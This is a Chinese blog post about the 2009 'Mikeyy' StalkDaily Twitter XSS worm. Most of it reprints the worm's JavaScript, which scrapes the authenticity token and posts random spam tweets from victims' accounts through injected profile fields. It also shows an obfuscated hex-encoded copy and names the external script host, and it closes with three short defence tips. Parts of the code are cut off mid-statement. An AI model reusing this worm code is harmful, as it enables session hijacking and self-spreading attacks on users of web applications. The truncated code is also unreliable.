这个Mikeyy家伙才17岁,为了在twitter给自己打广告弄的XSS蠕虫,这么恶毒的方式也用上了……
原始XSS Worm:
function XHConn() {感染方式:
var xmlhttp, bComplete = false;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
}
catch(e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e) {
try {
xmlhttp = new XMLHttpRequest();
}
catch(e) {
xmlhttp = false;
}
}
}
if (!xmlhttp) return null;
this.connect = function(sURL, sMethod, sVars, fnDone) {
if (!xmlhttp) return false;
bComplete = false;
sMethod = sMethod.toUpperCase();
try {
if (sMethod == "GET") {
xmlhttp.open(sMethod, sURL + "?" + sVars, true);
sVars = "";
}
else {
xmlhttp.open(sMethod, sURL, true);
xmlhttp.setRequestHeader("Method", "POST " + sURL + " HTTP/1.1");
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
}
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 && !bComplete) {
bComplete = true;
fnDone(xmlhttp);
}
};
xmlhttp.send(sVars);
}
catch(z) {
return false;
}
return true;
};
return this;
}
function urlencode(str) {
var histogram = {},
tmp_arr = [];
var ret = str.toString();
var replacer = function(search, replace, str) {
var tmp_arr = [];
tmp_arr = str.split(search);
return tmp_arr.join(replace);
};
histogram["'"] = '%27';
histogram['('] = '%28';
histogram[')'] = '%29';
histogram['*'] = '%2A';
histogram['~'] = '%7E';
histogram['!'] = '%21';
histogram['%20'] = '+';
ret = encodeURIComponent(ret);
for (search in histogram) {
replace = histogram[search];
ret = replacer(search, replace, ret)
}
return ret.replace(/(\%([a-z0-9]{2}))/g,
function(full, m1, m2) {
return "%" + m2.toUpperCase();
});
return ret;
}
var content = document.documentElement.innerHTML;
userreg = new RegExp(/");
document.write("");
function wait() {
var content = document.documentElement.innerHTML;
authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);
var Randomupdate = new Array();
randomUpdate[0] = "Dude, www.StalkDaily.com is awesome. What's the fuss?";
randomUpdate[1] = "Join www.StalkDaily.com everyone!";
randomUpdate[2] = "Woooo, www.StalkDaily.com :)";
randomUpdate[3] = "Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4] = "Wow...www.StalkDaily.com";
randomUpdate[5] = "@twitter www.StalkDaily.com";
var genRand = randomUpdate[Math.floor(Math.random() * randomUpdate.length)];
updateEncode = urlencode(genRand);
var xss = urlencode('http://www.stalkdaily.com">
在Twitter个人资料的location与web栏插入恶意代码,当其它用户浏览某人个资料时,该XSS蠕虫就会触发。
XSS蠕虫中转站:http://content.ireel.com/xssjs.js
var _0x8da4=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x4D\x69\x63\x72\x6F\x73\x6F \x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x63\x6F\x6E\x6E\x65\x63\x74","\x74\x6F\x55\x70\x70 \x65\x72\x43\x61\x73\x65","\x47\x45\x54","\x3F","\x6F\x70\x65\x6E","","\x4D\x65\x74\ x68\x6F\x64","\x50\x4F\x53\x54\x20","\x20\x48\x54\x54\x50\x2F\x31\x2E\x31","\x73\x65\x74\x52 \x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\ x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D \x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","安全防范:
1.更改hosts文件,屏蔽传染网址。
2.使用noscript火狐扩展屏蔽恶意代码
3.修改个人资料,删除恶意代码
0 评论:
发表评论